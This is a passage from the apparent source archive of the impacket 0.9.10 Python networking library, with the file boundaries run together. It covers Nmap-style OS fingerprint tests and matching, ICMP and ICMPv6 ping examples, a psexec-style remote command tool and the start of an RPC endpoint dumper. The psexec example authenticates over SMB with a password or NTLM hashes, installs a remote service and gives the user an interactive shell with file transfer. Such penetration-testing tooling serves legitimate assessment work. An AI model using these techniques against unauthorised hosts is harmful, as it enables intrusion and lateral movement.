self.seq_responses[i-1].get_ipid() cur_ipid = self.seq_responses[i].get_ipid() if prev_ipid != 0 or cur_ipid != 0: null_ipids = 0 if prev_ipid <= cur_ipid: ipid_diffs[i-1] = cur_ipid - prev_ipid else: ipid_diffs[i-1] = (cur_ipid - prev_ipid + 65536) & 0xffff if self.seq_num_responses > 2 and ipid_diffs[i-1] > 20000: self.add_result('TI', ipidclasses[nmap2_seq.IPID_SEQ_RD]) return if null_ipids: self.add_result('TI', ipidclasses[nmap2_seq.IPID_SEQ_ZERO]) return # Constant all_zero = 1 for i in xrange(0, self.seq_num_responses - 1): if ipid_diffs[i] != 0: all_zero = 0 break if all_zero: self.add_result('TI', ipidclasses[nmap2_seq.IPID_SEQ_CONSTANT]) return # Random positive increments for i in xrange(0, self.seq_num_responses - 1): if ipid_diffs[i] > 1000 and \ ((ipid_diffs[i] % 256 != 0) or \ ((ipid_diffs[i] % 256 == 0) and (ipid_diffs[i] >= 25600))): self.add_result('TI', ipidclasses[nmap2_seq.IPID_SEQ_RPI]) return # Broken Increment and Incremental is_incremental = 1 # All diferences are less than 10 is_ms = 1 # All diferences are multiples of 256 and no greater than 5120 for i in xrange(0, self.seq_num_responses - 1): if is_ms and ((ipid_diffs[i] > 5120) or (ipid_diffs[i] % 256) != 0): is_ms = 0 if is_incremental and ipid_diffs[i] > 9: is_incremental = 0 if is_ms: self.add_result('TI', ipidclasses[nmap2_seq.IPID_SEQ_BROKEN_INCR]) elif is_incremental: self.add_result('TI', ipidclasses[nmap2_seq.IPID_SEQ_INCR]) def calc_ts(self): # 1. If any of the responses have no timestamp option, TS # is set to U (unsupported). # 2. If any of the timestamp values are zero, TS is set to 0. # 3. If the average increments per second falls within the # ranges 0-5.66, 70-150, or 150-350, TS is set to 1, 7, or 8, # respectively. These three ranges get special treatment # because they correspond to the 2 Hz, 100 Hz, and 200 Hz # frequencies used by many hosts. # 4. In all other cases, Nmap records the binary logarithm of # the average increments per second, rounded to the nearest # integer. Since most hosts use 1,000 Hz frequencies, A is # a common result. if self.pre_ts_seqclass == nmap2_seq.TS_SEQ_ZERO: self.add_result('TS', '0') elif self.pre_ts_seqclass == nmap2_seq.TS_SEQ_UNSUPPORTED: self.add_result('TS', 'U') elif self.seq_num_responses < 2: return avg_freq = 0.0 for i in xrange(0, self.seq_num_responses - 1): dhz = self.ts_diffs[i] / self.time_diffs[i] avg_freq += dhz / (self.seq_num_responses - 1) PyImpact.t_log(2, "The avg TCP TS HZ is: %f" % avg_freq) if avg_freq <= 5.66: self.add_result('TS', "1") elif 70 < avg_freq and avg_freq <= 150: self.add_result('TS', "7") elif 150 < avg_freq and avg_freq <= 350: self.add_result('TS', "8") else: ts = int(round(.5 + math.log(avg_freq)/math.log(2))) self.add_result('TS', "%X" % ts) def calc_sp(self): seq_gcd = reduce(my_gcd, self.seq_diffs) seq_avg_rate = 0.0 for i in xrange(0, self.seq_num_responses - 1): seq_avg_rate += self.seq_diffs[i] / self.time_diffs[i] seq_avg_rate /= (self.seq_num_responses - 1) seq_rate = seq_avg_rate si_index = 0 seq_stddev = 0 if 0 == seq_gcd: seq_rate = 0 else: seq_rate = int(round(.5 + (math.log(seq_rate) / math.log(2)) * 8)) div_gcd = 1 if seq_gcd > 9: div_gcd = seq_gcd for i in xrange(0, self.seq_num_responses - 1): rtmp = (self.seq_diffs[i] / self.time_diffs[i]) / div_gcd - \ seq_avg_rate / div_gcd seq_stddev += rtmp * rtmp seq_stddev /= self.seq_num_responses - 2 seq_stddev = math.sqrt(seq_stddev) if seq_stddev <= 1: si_index = 0 else: si_index = int(round(.5 + (math.log(seq_stddev) / math.log(2)) * 8.0)) self.add_result('SP', "%X" % si_index) self.add_result('GCD', "%X" % seq_gcd) self.add_result('ISR', "%X" % seq_rate) class nmap2_ops_container(os_id_test): def __init__(self, responses): os_id_test.__init__(self, 0) self.seq_responses = responses self.seq_num_responses = len(responses) def test_id(self): return "OPS" def process(self): if self.seq_num_responses != 6: self.add_result('R', 'N') return for i in xrange(0, self.seq_num_responses): tests = nmap2_tcp_tests(self.seq_responses[i].get_ip(), self.seq_responses[i].get_tcp(), 0, 0) self.add_result("O%i" % (i+1), tests.get_options()) def get_final_result(self): if not self.get_result_dict(): return None else: return {self.test_id(): self.get_result_dict()} class nmap2_win_container(os_id_test): def __init__(self, responses): os_id_test.__init__(self, 0) self.seq_responses = responses self.seq_num_responses = len(responses) def test_id(self): return "WIN" def process(self): if self.seq_num_responses != 6: self.add_result('R', 'N') return for i in xrange(0, self.seq_num_responses): tests = nmap2_tcp_tests(self.seq_responses[i].get_ip(), self.seq_responses[i].get_tcp(), 0, 0) self.add_result("W%i" % (i+1), tests.get_win()) def get_final_result(self): if not self.get_result_dict(): return None else: return {self.test_id(): self.get_result_dict()} class nmap2_t1_container(os_id_test): def __init__(self, responses, seq_base): os_id_test.__init__(self, 0) self.seq_responses = responses self.seq_num_responses = len(responses) self.seq_base = seq_base def test_id(self): return "T1" def process(self): # R, DF, T*, TG*, W-, S, A, F, O-, RD*, Q if self.seq_num_responses < 1: self.add_result("R","N") return response = self.seq_responses[0] tests = nmap2_tcp_tests(response.get_ip(), response.get_tcp(), self.seq_base, nmap2_tcp_probe.acknowledgment) self.add_result("R", "Y") self.add_result("DF", tests.get_df()) self.add_result("S", tests.get_seq()) self.add_result("A", tests.get_ack()) self.add_result("F", tests.get_flags()) self.add_result("Q", tests.get_quirks()) def get_final_result(self): if not self.get_result_dict(): return None else: return {self.test_id(): self.get_result_dict()} class nmap2_icmp_container(os_id_test): def __init__(self, responses): os_id_test.__init__(self, 0) self.icmp_responses = responses self.icmp_num_responses = len(responses) def test_id(self): return "IE" def process(self): # R, DFI, T*, TG*, TOSI, CD, SI, DLI* if self.icmp_num_responses != 2: self.add_result("R","N") return ip1 = self.icmp_responses[0].child() ip2 = self.icmp_responses[1].child() icmp1 = ip1.child() icmp2 = ip2.child() self.add_result("R", "Y") # Value Description # N Neither of the ping responses have the DF bit set. # S Both responses echo the DF value of the probe. # Y Both of the response DF bits are set. # O The one remaining other combination-both responses have the DF bit toggled. if not ip1.get_ip_df() and not ip2.get_ip_df(): self.add_result("DFI","N") elif ip1.get_ip_df() and not ip2.get_ip_df(): self.add_result("DFI","S") elif ip1.get_ip_df() and ip2.get_ip_df(): self.add_result("DFI","Y") else: self.add_result("DFI","O") # Value Description # Z Both TOS values are zero. # S Both TOS values are each the same as in the corresponding probe. # When they both use the same non-zero number, it is recorded here. # O Any other combination. if ip1.get_ip_tos() == 0 and ip2.get_ip_tos() == 0: self.add_result("TOSI","Z") elif ip1.get_ip_tos() == 0 and ip2.get_ip_tos() == 4: self.add_result("TOSI","S") elif ip1.get_ip_tos() == ip2.get_ip_tos(): self.add_result("TOSI","%X" % ip1.get_ip_tos()) else: self.add_result("TOSI","O") # Value Description # Z Both code values are zero. # S Both code values are the same as in the corresponding probe. # When they both use the same non-zero number, it is shown here. # O Any other combination. if icmp1.get_icmp_code() == 0 and icmp2.get_icmp_code() == 0: self.add_result("CD","Z") elif icmp1.get_icmp_code() == 9 and icmp2.get_icmp_code() == 0: self.add_result("CD","S") elif icmp1.get_icmp_code() == icmp2.get_icmp_code(): self.add_result("CD","%X" % icmp1.get_icmp_code()) else: self.add_result("CD","O") # Value Description # Z Both sequence numbers are set to 0. # S Both sequence numbers echo the ones from the probes. # When they both use the same non-zero number, it is recorded here. # O Any other combination. if icmp1.get_icmp_seq() == 0 and icmp2.get_icmp_seq() == 0: self.add_result("SI","Z") elif (icmp1.get_icmp_seq() == nmap2_icmp_echo_probe_1.sequence_number and icmp2.get_icmp_seq() == nmap2_icmp_echo_probe_1.sequence_number + 1): self.add_result("SI","S") elif icmp1.get_icmp_seq() == icmp2.get_icmp_seq(): self.add_result("SI","%X" % icmp1.get_icmp_code()) else: self.add_result("SI","O") def get_final_result(self): if not self.get_result_dict(): return None else: return {self.test_id(): self.get_result_dict()} class nmap1_tcp_closed_1(nmap1_tcp_probe): def __init__(self, id, addresses, tcp_ports): nmap1_tcp_probe.__init__(self, id, addresses, tcp_ports, 0) self.t.set_SYN() def test_id(self): return "T5" def is_mine(self, packet): if tcp_probe.is_mine(self, packet): ip = packet.child() if not ip: return 0 tcp = ip.child() if not tcp: return 0 if tcp.get_RST(): return 1 else: return 0 else: return 0 class nmap2_tcp_closed_1(nmap2_tcp_probe_2_6): # ... # T5 sends a TCP SYN packet without IP DF and a window field of # 31337 to a closed port # ... def __init__(self, id, addresses, tcp_ports): nmap2_tcp_probe_2_6.__init__(self, id, addresses, tcp_ports, 0) self.t.set_SYN() self.i.set_ip_df(0) self.t.set_th_win(31337) def test_id(self): return "T5" class nmap1_tcp_closed_2(nmap1_tcp_probe): def __init__(self, id, addresses, tcp_ports): nmap1_tcp_probe.__init__(self, id, addresses, tcp_ports, 0) self.t.set_ACK() def test_id(self): return "T6" class nmap2_tcp_closed_2(nmap2_tcp_probe_2_6): # ... # T6 sends a TCP ACK packet with IP DF and a window field of # 32768 to a closed port. # ... def __init__(self, id, addresses, tcp_ports): nmap2_tcp_probe_2_6.__init__(self, id, addresses, tcp_ports, 0) self.t.set_ACK() self.i.set_ip_df(1) self.t.set_th_win(32768) def test_id(self): return "T6" class nmap1_tcp_closed_3(nmap1_tcp_probe): def __init__(self, id, addresses, tcp_ports): nmap1_tcp_probe.__init__(self, id, addresses, tcp_ports, 0) self.t.set_FIN() self.t.set_URG() self.t.set_PSH() def test_id(self): return "T7" class nmap2_tcp_closed_3(nmap2_tcp_probe_7): # ... # T7 sends a TCP packet with the FIN, PSH, and URG flags set and a # window field of 65535 to a closed port. The IP DF bit is not set. # ... def __init__(self, id, addresses, tcp_ports): nmap2_tcp_probe_7.__init__(self, id, addresses, tcp_ports, 0) self.t.set_FIN() self.t.set_URG() self.t.set_PSH() self.t.set_th_win(65535) self.i.set_ip_df(0) def test_id(self): return "T7" class NMAP2_OS_Class: def __init__(self, vendor, name, family, device_type): self.__vendor = vendor self.__name = name self.__family = family self.__device_type = device_type def get_vendor(self): return self.__vendor def get_name(self): return self.__name def get_family(self): return self.__family def get_device_type(self): return self.__device_type class NMAP2_Fingerprint: def __init__(self, id, os_class, tests): self.__id = id self.__os_class = os_class self.__tests = tests def get_id(self): return self.__id def get_os_class(self): return self.__os_class def get_tests(self): return self.__tests def __str__(self): ret = "FP: [%s]" % self.__id ret += "\n vendor: %s" % self.__os_class.get_vendor() ret += "\n name: %s" % self.__os_class.get_name() ret += "\n family: %s" % self.__os_class.get_family() ret += "\n device_type: %s" % self.__os_class.get_device_type() for test in self.__tests: ret += "\n test: %s" % test for pair in self.__tests[test]: ret += "\n %s = [%s]" % (pair, self.__tests[test][pair]) return ret literal_conv = { "RIPL" : { "G" : 0x148 }, "RID" : { "G" : 0x1042 }, "RUL" : { "G" : 0x134 } } def parse_int(self, field, value): try: return int(value, 16) except ValueError, err: if NMAP2_Fingerprint.literal_conv.has_key( field ): if NMAP2_Fingerprint.literal_conv[field].has_key(value): return NMAP2_Fingerprint.literal_conv[field][value] return 0 def match(self, field, ref, value): options = ref.split("|") for option in options: if option.startswith(">"): if self.parse_int(field, value) > \ self.parse_int(field, option[1:]): return True elif option.startswith("<"): if self.parse_int(field, value) < \ self.parse_int(field, option[1:]): return True elif option.find("-") > -1: range = option.split("-") if (self.parse_int(field, value) >= \ self.parse_int(field, range[0]) and \ self.parse_int(field, value) <= \ self.parse_int(field, range[1])): return True else: if str(value) == str(option): return True return False def compare(self, sample, mp): max_points = 0 total_points = 0 for test in self.__tests: # ignore unknown response lines: if not sample.has_key(test): continue for field in self.__tests[test]: # ignore unsupported fields: if not sample[test].has_key(field) or \ not mp.has_key(test) or \ not mp[test].has_key(field): continue ref = self.__tests[test][field] value = sample[test][field] points = int(mp[test][field]) max_points += points if self.match(field, ref, value): total_points += points return (total_points / float(max_points)) * 100 class NMAP2_Fingerprint_Matcher: def __init__(self, filename): self.__filename = filename def find_matches(self, res, threshold): output = [] try: infile = open(self.__filename,"r") mp = self.parse_mp(self.matchpoints(infile)) for fingerprint in self.fingerprints(infile): fp = self.parse_fp(fingerprint) similarity = fp.compare(res, mp) if similarity >= threshold: print "\"%s\" matches with an accuracy of %.2f%%" \ % (fp.get_id(), similarity) output.append((similarity / 100, fp.get_id(), (fp.get_os_class().get_vendor(), fp.get_os_class().get_name(), fp.get_os_class().get_family(), fp.get_os_class().get_device_type()))) infile.close() except IOError, err: print "IOError: %s", err return output def sections(self, infile, token): OUT = 0 IN = 1 state = OUT output = [] for line in infile: line = line.strip() if state == OUT: if line.startswith(token): state = IN output = [line] elif state == IN: if line: output.append(line) else: state = OUT yield output output = [] if output: yield output def fingerprints(self, infile): for section in self.sections(infile,"Fingerprint"): yield section def matchpoints(self, infile): return self.sections(infile,"MatchPoints").next() def parse_line(self, line): name = line[:line.find("(")] pairs = line[line.find("(") + 1 : line.find(")")] test = {} for pair in pairs.split("%"): pair = pair.split("=") test[pair[0]] = pair[1] return (name, test) def parse_fp(self, fp): tests = {} for line in fp: if line.startswith("#"): continue elif line.startswith("Fingerprint"): fingerprint = line[len("Fingerprint") + 1:] elif line.startswith("Class"): (vendor, name, family, device_type) = line[len("Class") + 1:].split("|") os_class = NMAP2_OS_Class(vendor.strip(), name.strip(), family.strip(), device_type.strip()) else: test = self.parse_line(line) tests[test[0]] = test[1] return NMAP2_Fingerprint(fingerprint, os_class, tests) def parse_mp(self, fp): tests = {} for line in fp: if line.startswith("#"): continue elif line.startswith("MatchPoints"): continue else: test = self.parse_line(line) tests[test[0]] = test[1] return tests impacket-0.9.10/examples/ping.py0000600000076500000240000000476412141750576016612 0ustar betostaff00000000000000#!/usr/bin/python # Copyright (c) 2003 CORE Security Technologies # # This software is provided under under a slightly modified version # of the Apache Software License. See the accompanying LICENSE file # for more information. # # $Id: ping.py 17 2003-10-27 17:36:57Z jkohen $ # # Simple ICMP ping. # # This implementation of ping uses the ICMP echo and echo-reply packets # to check the status of a host. If the remote host is up, it should reply # to the echo probe with an echo-reply packet. # Note that this isn't a definite test, as in the case the remote host is up # but refuses to reply the probes. # Also note that the user must have special access to be able to open a raw # socket, which this program requires. # # Authors: # Gerardo Richarte # Javier Kohen # # Reference for: # ImpactPacket: IP, ICMP, DATA. # ImpactDecoder. import select import socket import time import sys from impacket import ImpactDecoder, ImpactPacket if len(sys.argv) < 3: print "Use: %s " % sys.argv[0] sys.exit(1) src = sys.argv[1] dst = sys.argv[2] # Create a new IP packet and set its source and destination addresses. ip = ImpactPacket.IP() ip.set_ip_src(src) ip.set_ip_dst(dst) # Create a new ICMP packet of type ECHO. icmp = ImpactPacket.ICMP() icmp.set_icmp_type(icmp.ICMP_ECHO) # Include a 156-character long payload inside the ICMP packet. icmp.contains(ImpactPacket.Data("A"*156)) # Have the IP packet contain the ICMP packet (along with its payload). ip.contains(icmp) # Open a raw socket. Special permissions are usually required. s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP) s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1) seq_id = 0 while 1: # Give the ICMP packet the next ID in the sequence. seq_id += 1 icmp.set_icmp_id(seq_id) # Calculate its checksum. icmp.set_icmp_cksum(0) icmp.auto_checksum = 1 # Send it to the target host. s.sendto(ip.get_packet(), (dst, 0)) # Wait for incoming replies. if s in select.select([s],[],[],1)[0]: reply = s.recvfrom(2000)[0] # Use ImpactDecoder to reconstruct the packet hierarchy. rip = ImpactDecoder.IPDecoder().decode(reply) # Extract the ICMP packet from its container (the IP packet). ricmp = rip.child() # If the packet matches, report it to the user. if rip.get_ip_dst() == src and rip.get_ip_src() == dst and icmp.ICMP_ECHOREPLY == ricmp.get_icmp_type(): print "Ping reply for sequence #%d" % ricmp.get_icmp_id() time.sleep(1) impacket-0.9.10/examples/ping6.py0000600000076500000240000000464312141750576016674 0ustar betostaff00000000000000#!/usr/bin/python # Copyright (c) 2003-2012 CORE Security Technologies # # This software is provided under under a slightly modified version # of the Apache Software License. See the accompanying LICENSE file # for more information. # # $Id: ping6.py 606 2012-07-14 23:07:54Z bethus@gmail.com $ # # Simple ICMP6 ping. # # This implementation of ping uses the ICMP echo and echo-reply packets # to check the status of a host. If the remote host is up, it should reply # to the echo probe with an echo-reply packet. # Note that this isn't a definite test, as in the case the remote host is up # but refuses to reply the probes. # Also note that the user must have special access to be able to open a raw # socket, which this program requires. # # Authors: # Alberto Solino # # Reference for: # ImpactPacket: ICMP6 # ImpactDecoder. import select import socket import time import sys from impacket import ImpactDecoder, ImpactPacket, IP6, ICMP6, version print version.BANNER if len(sys.argv) < 3: print "Use: %s " % sys.argv[0] sys.exit(1) src = sys.argv[1] dst = sys.argv[2] # Create a new IP packet and set its source and destination addresses. ip = IP6.IP6() ip.set_source_address(src) ip.set_destination_address(dst) ip.set_traffic_class(0) ip.set_flow_label(0) ip.set_hop_limit(64) # Open a raw socket. Special permissions are usually required. s = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_ICMPV6) payload = "A"*156 print "PING %s %d data bytes" % (dst, len(payload)) seq_id = 0 while 1: # Give the ICMP packet the next ID in the sequence. seq_id += 1 icmp = ICMP6.ICMP6.Echo_Request(1, seq_id, payload) # Have the IP packet contain the ICMP packet (along with its payload). ip.contains(icmp) ip.set_next_header(ip.child().get_ip_protocol_number()) ip.set_payload_length(ip.child().get_size()) icmp.calculate_checksum() # Send it to the target host. s.sendto(icmp.get_packet(), (dst, 0)) # Wait for incoming replies. if s in select.select([s],[],[],1)[0]: reply = s.recvfrom(2000)[0] # Use ImpactDecoder to reconstruct the packet hierarchy. rip = ImpactDecoder.ICMP6Decoder().decode(reply) # If the packet matches, report it to the user. if ICMP6.ICMP6.ECHO_REPLY == rip.get_type(): print "%d bytes from %s: icmp_seq=%d " % (rip.child().get_size()-4,dst,rip.get_echo_sequence_number()) time.sleep(1) impacket-0.9.10/examples/psexec.py0000600000076500000240000003411112141750576017131 0ustar betostaff00000000000000#!/usr/bin/python # Copyright (c) 2003-2012 CORE Security Technologies # # This software is provided under under a slightly modified version # of the Apache Software License. See the accompanying LICENSE file # for more information. # # $Id: psexec.py 712 2012-09-06 04:26:22Z bethus@gmail.com $ # # PSEXEC like functionality example using RemComSvc (https://github.com/kavika13/RemCom) # # Author: # beto (bethus@gmail.com) # # Reference for: # DCE/RPC and SMB. import sys import os import cmd from impacket import version from impacket.smbconnection import * from impacket.dcerpc import dcerpc_v4, dcerpc, transport, svcctl, srvsvc from impacket.structure import Structure from threading import Thread, Lock from impacket.examples import remcomsvc, serviceinstall import argparse import random import string import time class RemComMessage(Structure): structure = ( ('Command','4096s=""'), ('WorkingDir','260s=""'), ('Priority',' 0: try: s.waitNamedPipe(tid,pipe) pipeReady = True except: tries -= 1 time.sleep(2) pass if tries == 0: print '[!] Pipe not ready, aborting' raise fid = s.openFile(tid,pipe,accessMask, creationOption = 0x40, fileAttributes = 0x80) return fid def doStuff(self, rpctransport): dce = dcerpc.DCERPC_v5(rpctransport) try: dce.connect() except Exception, e: print e sys.exit(1) global dialect dialect = rpctransport.get_smb_connection().getDialect() try: unInstalled = False s = rpctransport.get_smb_connection() # We don't wanna deal with timeouts from now on. s.setTimeout(100000) if self.__exeFile is None: installService = serviceinstall.ServiceInstall(rpctransport.get_smb_connection(), remcomsvc.RemComSvc()) else: try: f = open(self.__exeFile) except Exception, e: print e sys.exit(1) installService = serviceinstall.ServiceInstall(rpctransport.get_smb_connection(), f) installService.install() if self.__exeFile is not None: f.close() tid = s.connectTree('IPC$') fid_main = self.openPipe(s,tid,'\RemCom_communicaton',0x12019f) packet = RemComMessage() pid = os.getpid() packet['Machine'] = ''.join([random.choice(string.letters) for i in range(4)]) if self.__path is not None: packet['WorkingDir'] = self.__path packet['Command'] = self.__command packet['ProcessID'] = pid s.writeNamedPipe(tid, fid_main, str(packet)) # Here we'll store the command we type so we don't print it back ;) # ( I know.. globals are nasty :P ) global LastDataSent LastDataSent = '' # Create the pipes threads stdin_pipe = RemoteStdInPipe(rpctransport,'\%s%s%d' % (RemComSTDIN ,packet['Machine'],packet['ProcessID']), smb.FILE_WRITE_DATA | smb.FILE_APPEND_DATA, installService.getShare() ) stdin_pipe.start() stdout_pipe = RemoteStdOutPipe(rpctransport,'\%s%s%d' % (RemComSTDOUT,packet['Machine'],packet['ProcessID']), smb.FILE_READ_DATA ) stdout_pipe.start() stderr_pipe = RemoteStdErrPipe(rpctransport,'\%s%s%d' % (RemComSTDERR,packet['Machine'],packet['ProcessID']), smb.FILE_READ_DATA ) stderr_pipe.start() # And we stay here till the end ans = s.readNamedPipe(tid,fid_main,8) if len(ans): retCode = RemComResponse(ans) print "[*] Process %s finished with ErrorCode: %d, ReturnCode: %d" % (self.__command, retCode['ErrorCode'], retCode['ReturnCode']) installService.uninstall() unInstalled = True sys.exit(retCode['ErrorCode']) except: if unInstalled is False: installService.uninstall() sys.stdout.flush() sys.exit(1) class Pipes(Thread): def __init__(self, transport, pipe, permissions, share=None): Thread.__init__(self) self.server = 0 self.transport = transport self.credentials = transport.get_credentials() self.tid = 0 self.fid = 0 self.share = share self.port = transport.get_dport() self.pipe = pipe self.permissions = permissions self.daemon = True def connectPipe(self): try: lock.acquire() global dialect #self.server = SMBConnection('*SMBSERVER', self.transport.get_smb_connection().getRemoteHost(), sess_port = self.port, preferredDialect = SMB_DIALECT) self.server = SMBConnection('*SMBSERVER', self.transport.get_smb_connection().getRemoteHost(), sess_port = self.port, preferredDialect = dialect) user, passwd, domain, lm, nt = self.credentials self.server.login(user, passwd, domain, lm, nt) lock.release() self.tid = self.server.connectTree('IPC$') self.server.waitNamedPipe(self.tid, self.pipe) self.fid = self.server.openFile(self.tid,self.pipe,self.permissions, creationOption = 0x40, fileAttributes = 0x80) self.server.setTimeout(1000000) except: print "[!] Something wen't wrong connecting the pipes(%s), try again" % self.__class__ class RemoteStdOutPipe(Pipes): def __init__(self, transport, pipe, permisssions): Pipes.__init__(self, transport, pipe, permisssions) def run(self): self.connectPipe() while True: try: ans = self.server.readFile(self.tid,self.fid, 0, 1024) except Exception, e: pass else: try: global LastDataSent if ans != LastDataSent: sys.stdout.write(ans) sys.stdout.flush() else: # Don't echo what I sent, and clear it up LastDataSent = '' # Just in case this got out of sync, i'm cleaning it up if there are more than 10 chars, # it will give false positives tho.. we should find a better way to handle this. if LastDataSent > 10: LastDataSent = '' except: pass class RemoteStdErrPipe(Pipes): def __init__(self, transport, pipe, permisssions): Pipes.__init__(self, transport, pipe, permisssions) def run(self): self.connectPipe() while True: try: ans = self.server.readFile(self.tid,self.fid, 0, 1024) except Exception, e: pass else: try: sys.stderr.write(str(ans)) sys.stderr.flush() except: pass class RemoteShell(cmd.Cmd): def __init__(self, server, port, credentials, tid, fid, share): cmd.Cmd.__init__(self, False) self.prompt = '\x08' self.server = server self.transferClient = None self.tid = tid self.fid = fid self.credentials = credentials self.share = share self.port = port self.intro = '[!] Press help for extra shell commands' def connect_transferClient(self): #self.transferClient = SMBConnection('*SMBSERVER', self.server.getRemoteHost(), sess_port = self.port, preferredDialect = SMB_DIALECT) self.transferClient = SMBConnection('*SMBSERVER', self.server.getRemoteHost(), sess_port = self.port, preferredDialect = dialect) user, passwd, domain, lm, nt = self.credentials self.transferClient.login(user, passwd, domain, lm, nt) def do_help(self, line): print """ lcd {path} - changes the current local directory to {path} exit - terminates the server process (and this session) put {src_file, dst_path} - uploads a local file to the dst_path RELATIVE to the connected share (%s) get {file} - downloads pathname RELATIVE to the connected share (%s) to the current local dir ! {cmd} - executes a local shell cmd """ % (self.share, self.share) self.send_data('\r\n', False) def do_shell(self, s): os.system(s) self.send_data('\r\n') def do_get(self, src_path): try: if self.transferClient is None: self.connect_transferClient() import ntpath filename = ntpath.basename(src_path) fh = open(filename,'wb') print "[*] Downloading %s\%s" % (self.share, src_path) self.transferClient.getFile(self.share, src_path, fh.write) fh.close() except Exception, e: print e pass self.send_data('\r\n') def do_put(self, s): try: if self.transferClient is None: self.connect_transferClient() params = s.split(' ') if len(params) > 1: src_path = params[0] dst_path = params[1] elif len(params) == 1: src_path = params[0] dst_path = '/' src_file = os.path.basename(src_path) fh = open(src_path, 'rb') f = dst_path + '/' + src_file pathname = string.replace(f,'/','\\') print "[*] Uploading %s to %s\%s" % (src_file, self.share, dst_path) self.transferClient.putFile(self.share, pathname, fh.read) fh.close() except Exception, e: print e pass self.send_data('\r\n') def do_lcd(self, s): if s == '': print os.getcwd() else: os.chdir(s) self.send_data('\r\n') def emptyline(self): self.send_data('\r\n') return def default(self, line): self.send_data(line+'\r\n') def send_data(self, data, hideOutput = True): if hideOutput is True: global LastDataSent LastDataSent = data else: LastDataSent = '' self.server.writeFile(self.tid, self.fid, data) class RemoteStdInPipe(Pipes): def __init__(self, transport, pipe, permisssions, share=None): Pipes.__init__(self, transport, pipe, permisssions, share) def run(self): self.connectPipe() self.shell = RemoteShell(self.server, self.port, self.credentials, self.tid, self.fid, self.share) self.shell.cmdloop() # Process command-line arguments. if __name__ == '__main__': print version.BANNER parser = argparse.ArgumentParser() parser.add_argument('target', action='store', help='[domain/][username[:password]@]
') parser.add_argument('command', action='store', help='command to execute at the target (w/o path)') parser.add_argument('-path', action='store', help='path of the command to execute') parser.add_argument('-file', action='store', help="alternative RemCom binary (be sure it doesn't require CRT)") parser.add_argument('protocol', choices=PSEXEC.KNOWN_PROTOCOLS.keys(), nargs='?', default='445/SMB', help='transport protocol (default 445/SMB)') group = parser.add_argument_group('authentication') group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH') if len(sys.argv)==1: parser.print_help() sys.exit(1) options = parser.parse_args() import re domain, username, password, address = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match(options.target).groups('') if domain is None: domain = '' executer = PSEXEC(options.command, options.path, options.file, options.protocol, username, password, domain, options.hashes) executer.run(address) impacket-0.9.10/examples/rpcdump.py0000600000076500000240000001350712141750576017322 0ustar betostaff00000000000000#!/usr/bin/python # Copyright (c) 2003 CORE Security Technologies # # This software is provided under under a slightly modified version # of the Apache Software License. See the accompanying LICENSE file # for more information. # # $Id: rpcdump.py 706 2012-08-30 20:25:03Z bethus@gmail.com $ # # DCE/RPC endpoint mapper dumper. # # Author: # Javier Kohen # Alberto Solino # # Reference for: # DCE/RPC. import socket import string import sys import types from impacket import uuid, ntlm, version from impacket.dcerpc import dcerpc_v4, dcerpc, transport, epm, ndrutils import argparse class RPCDump: KNOWN_PROTOCOLS = { '139/SMB': (r'ncacn_np:%s[\pipe\epmapper]', 139), '445/SMB': (r'ncacn_np:%s[\pipe\epmapper]', 445), '135/TCP': (r'ncacn_ip_tcp:%s', 135), '135/UDP': (r'ncadg_ip_udp:%s', 135), '80/HTTP': (r'ncacn_http:%s', 80), } def __init__(self, protocols = None, username = '', password = '', domain='', hashes = None): if not protocols: protocols = RPCDump.KNOWN_PROTOCOLS.keys() self.__username = username self.__password = password self.__protocols = [protocols] self.__domain = domain self.__lmhash = '' self.__nthash = '' if hashes is not None: self.__lmhash, self.__nthash = hashes.split(':') def dump(self, addr): """Dumps the list of endpoints registered with the mapper listening at addr. Addr is a valid host name or IP address in string format. """ print 'Retrieving endpoint list from %s' % addr # Try all requested protocols until one works. entries = [] for protocol in self.__protocols: protodef = RPCDump.KNOWN_PROTOCOLS[protocol] port = protodef[1] print "Trying protocol %s..." % protocol stringbinding = protodef[0] % addr rpctransport = transport.DCERPCTransportFactory(stringbinding) rpctransport.set_dport(port) if hasattr(rpctransport, 'set_credentials'): # This method exists only for selected protocol sequences. rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash) try: entries = self.__fetchList(rpctransport) except Exception, e: print 'Protocol failed: %s' % e else: # Got a response. No need for further iterations. break # Display results. endpoints = {} # Let's groups the UUIDS for entry in entries: binding = epm.PrintStringBinding(entry['Tower']['Floors'], rpctransport.get_dip()) tmpUUID = str(entry['Tower']['Floors'][0]) if endpoints.has_key(tmpUUID) is not True: endpoints[tmpUUID] = {} endpoints[tmpUUID]['Bindings'] = list() if ndrutils.KNOWN_UUIDS.has_key(uuid.uuidtup_to_bin(uuid.string_to_uuidtup(tmpUUID))[:18]): endpoints[tmpUUID]['EXE'] = ndrutils.KNOWN_UUIDS[uuid.uuidtup_to_bin(uuid.string_to_uuidtup(tmpUUID))[:18]] else: endpoints[tmpUUID]['EXE'] = 'N/A' endpoints[tmpUUID]['Annotation'] = entry['Annotation'][:-1] endpoints[tmpUUID]['Bindings'].append(binding) if epm.KNOWN_PROTOCOLS.has_key(tmpUUID[:36]): endpoints[tmpUUID]['Protocol'] = epm.KNOWN_PROTOCOLS[tmpUUID[:36]] else: endpoints[tmpUUID]['Protocol'] = "N/A" #print "Transfer Syntax: %s" % entry['Tower']['Floors'][1] for endpoint in endpoints.keys(): print "Protocol: %s " % endpoints[endpoint]['Protocol'] print "Provider: %s " % endpoints[endpoint]['EXE'] print "UUID : %s %s" % (endpoint, endpoints[endpoint]['Annotation']) print "Bindings: " for binding in endpoints[endpoint]['Bindings']: print " %s" % binding print "" if entries: num = len(entries) if 1 == num: print 'Received one endpoint.' else: print 'Received %d endpoints.' % num else: print 'No endpoints found.' def __fetchList(self, rpctransport): # UDP only works over DCE/RPC version 4. if isinstance(rpctransport, transport.UDPTransport): dce = dcerpc_v4.DCERPC_v4(rpctransport) else: dce = dcerpc.DCERPC_v5(rpctransport) entries = [] dce.connect() dce.set_auth_level(ntlm.NTLM_AUTH_PKT_PRIVACY) dce.bind(epm.MSRPC_UUID_PORTMAP) rpcepm = epm.DCERPCEpm(dce) resp = rpcepm.lookup('', inquireType = 